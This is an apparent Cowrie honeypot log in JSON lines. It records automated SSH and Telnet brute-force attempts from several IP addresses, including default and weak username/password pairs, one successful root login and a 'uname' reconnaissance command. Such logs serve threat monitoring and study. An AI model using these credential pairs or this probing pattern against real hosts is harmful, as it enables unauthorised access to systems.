{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:22:19.660524Z","src_ip":"212.227.125.160","session":"3f4521803d2a"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:22:20.311403Z","src_ip":"212.227.125.160","session":"3f4521803d2a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:21.528573Z","src_ip":"212.227.125.160","session":"3f4521803d2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43218,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a04aeeffe2a","protocol":"ssh","message":"New connection: 212.227.235.229:43218 (1.2.3.4:22) [session: 9a04aeeffe2a]","sensor":"my-vps","timestamp":"2025-08-28T06:22:26.126909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:22:26.127830Z","src_ip":"212.227.235.229","session":"9a04aeeffe2a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:22:26.388347Z","src_ip":"212.227.235.229","session":"9a04aeeffe2a"}
{"eventid":"cowrie.session.closed","duration":31.963873863220215,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:26.879444Z","src_ip":"8.222.212.69","session":"60a6476e54b4"}
{"eventid":"cowrie.login.failed","username":"user1","password":"user1","message":"login attempt [user1/user1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:22:27.173153Z","src_ip":"212.227.235.229","session":"9a04aeeffe2a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:28.435988Z","src_ip":"212.227.235.229","session":"9a04aeeffe2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42380,"dst_ip":"1.2.3.4","dst_port":22,"session":"23962b5965bb","protocol":"ssh","message":"New connection: 212.227.125.160:42380 (1.2.3.4:22) [session: 23962b5965bb]","sensor":"my-vps","timestamp":"2025-08-28T06:22:36.225648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:22:36.226693Z","src_ip":"212.227.125.160","session":"23962b5965bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:22:36.444173Z","src_ip":"212.227.125.160","session":"23962b5965bb"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T06:22:37.105183Z","src_ip":"212.227.125.160","session":"23962b5965bb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:38.324654Z","src_ip":"212.227.125.160","session":"23962b5965bb"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":57484,"dst_ip":"1.2.3.4","dst_port":23,"session":"ea68d8632154","protocol":"telnet","message":"New connection: 8.222.212.69:57484 (1.2.3.4:23) [session: ea68d8632154]","sensor":"my-vps","timestamp":"2025-08-28T06:22:38.342952Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33262,"dst_ip":"1.2.3.4","dst_port":22,"session":"2faa20241b13","protocol":"ssh","message":"New connection: 212.227.235.229:33262 (1.2.3.4:22) [session: 2faa20241b13]","sensor":"my-vps","timestamp":"2025-08-28T06:22:42.740629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:22:42.741521Z","src_ip":"212.227.235.229","session":"2faa20241b13"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:22:42.991692Z","src_ip":"212.227.235.229","session":"2faa20241b13"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T06:22:43.740985Z","src_ip":"212.227.235.229","session":"2faa20241b13"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:44.992342Z","src_ip":"212.227.235.229","session":"2faa20241b13"}
{"eventid":"cowrie.session.connect","src_ip":"3.132.23.201","src_port":41982,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0699229cd3d","protocol":"telnet","message":"New connection: 3.132.23.201:41982 (1.2.3.4:23) [session: f0699229cd3d]","sensor":"my-vps","timestamp":"2025-08-28T06:22:50.155233Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37126,"dst_ip":"1.2.3.4","dst_port":22,"session":"50bad83fca23","protocol":"ssh","message":"New connection: 212.227.125.160:37126 (1.2.3.4:22) [session: 50bad83fca23]","sensor":"my-vps","timestamp":"2025-08-28T06:22:52.526572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:22:52.527267Z","src_ip":"212.227.125.160","session":"50bad83fca23"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:22:52.741007Z","src_ip":"212.227.125.160","session":"50bad83fca23"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T06:22:53.376853Z","src_ip":"212.227.125.160","session":"50bad83fca23"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:22:54.591036Z","src_ip":"212.227.125.160","session":"50bad83fca23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52878,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d5f65c00362","protocol":"ssh","message":"New connection: 212.227.235.229:52878 (1.2.3.4:22) [session: 9d5f65c00362]","sensor":"my-vps","timestamp":"2025-08-28T06:22:59.305794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:22:59.307277Z","src_ip":"212.227.235.229","session":"9d5f65c00362"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:22:59.561052Z","src_ip":"212.227.235.229","session":"9d5f65c00362"}
{"eventid":"cowrie.session.closed","duration":10.060978651046753,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:00.216144Z","src_ip":"3.132.23.201","session":"f0699229cd3d"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@WSX","message":"login attempt [oracle/!QAZ@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:00.325044Z","src_ip":"212.227.235.229","session":"9d5f65c00362"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:01.584280Z","src_ip":"212.227.235.229","session":"9d5f65c00362"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46872,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e3929b61f92","protocol":"ssh","message":"New connection: 212.227.125.160:46872 (1.2.3.4:22) [session: 7e3929b61f92]","sensor":"my-vps","timestamp":"2025-08-28T06:23:09.184005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:23:09.193384Z","src_ip":"212.227.125.160","session":"7e3929b61f92"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:23:09.406834Z","src_ip":"212.227.125.160","session":"7e3929b61f92"}
{"eventid":"cowrie.session.closed","duration":31.447690725326538,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:09.790580Z","src_ip":"8.222.212.69","session":"ea68d8632154"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:10.297863Z","src_ip":"212.227.125.160","session":"7e3929b61f92"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:11.522849Z","src_ip":"212.227.125.160","session":"7e3929b61f92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39318,"dst_ip":"1.2.3.4","dst_port":22,"session":"745da5da3127","protocol":"ssh","message":"New connection: 212.227.235.229:39318 (1.2.3.4:22) [session: 745da5da3127]","sensor":"my-vps","timestamp":"2025-08-28T06:23:15.770645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:23:15.771453Z","src_ip":"212.227.235.229","session":"745da5da3127"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:23:16.022489Z","src_ip":"212.227.235.229","session":"745da5da3127"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-28T06:23:16.776731Z","src_ip":"212.227.235.229","session":"745da5da3127"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":58538,"dst_ip":"1.2.3.4","dst_port":23,"session":"e68d933a9a91","protocol":"telnet","message":"New connection: 8.222.212.69:58538 (1.2.3.4:23) [session: e68d933a9a91]","sensor":"my-vps","timestamp":"2025-08-28T06:23:17.474633Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:18.029727Z","src_ip":"212.227.235.229","session":"745da5da3127"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53210,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e40cab6b5f2","protocol":"telnet","message":"New connection: 212.227.235.229:53210 (1.2.3.4:23) [session: 5e40cab6b5f2]","sensor":"my-vps","timestamp":"2025-08-28T06:23:24.477598Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60728,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3dd6c66be92","protocol":"ssh","message":"New connection: 212.227.125.160:60728 (1.2.3.4:22) [session: a3dd6c66be92]","sensor":"my-vps","timestamp":"2025-08-28T06:23:25.901167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:23:25.902299Z","src_ip":"212.227.125.160","session":"a3dd6c66be92"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:23:26.124850Z","src_ip":"212.227.125.160","session":"a3dd6c66be92"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:23:27.016647Z","src_ip":"212.227.125.160","session":"a3dd6c66be92"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:23:27.537552Z","src_ip":"212.227.125.160","session":"a3dd6c66be92"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:23:27.538321Z","src_ip":"212.227.125.160","session":"a3dd6c66be92"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:27.762558Z","src_ip":"212.227.125.160","session":"a3dd6c66be92"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:23:27.763705Z","src_ip":"212.227.125.160","session":"a3dd6c66be92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38288,"dst_ip":"1.2.3.4","dst_port":22,"session":"5954c662e6ae","protocol":"ssh","message":"New connection: 212.227.235.229:38288 (1.2.3.4:22) [session: 5954c662e6ae]","sensor":"my-vps","timestamp":"2025-08-28T06:23:32.491768Z"}
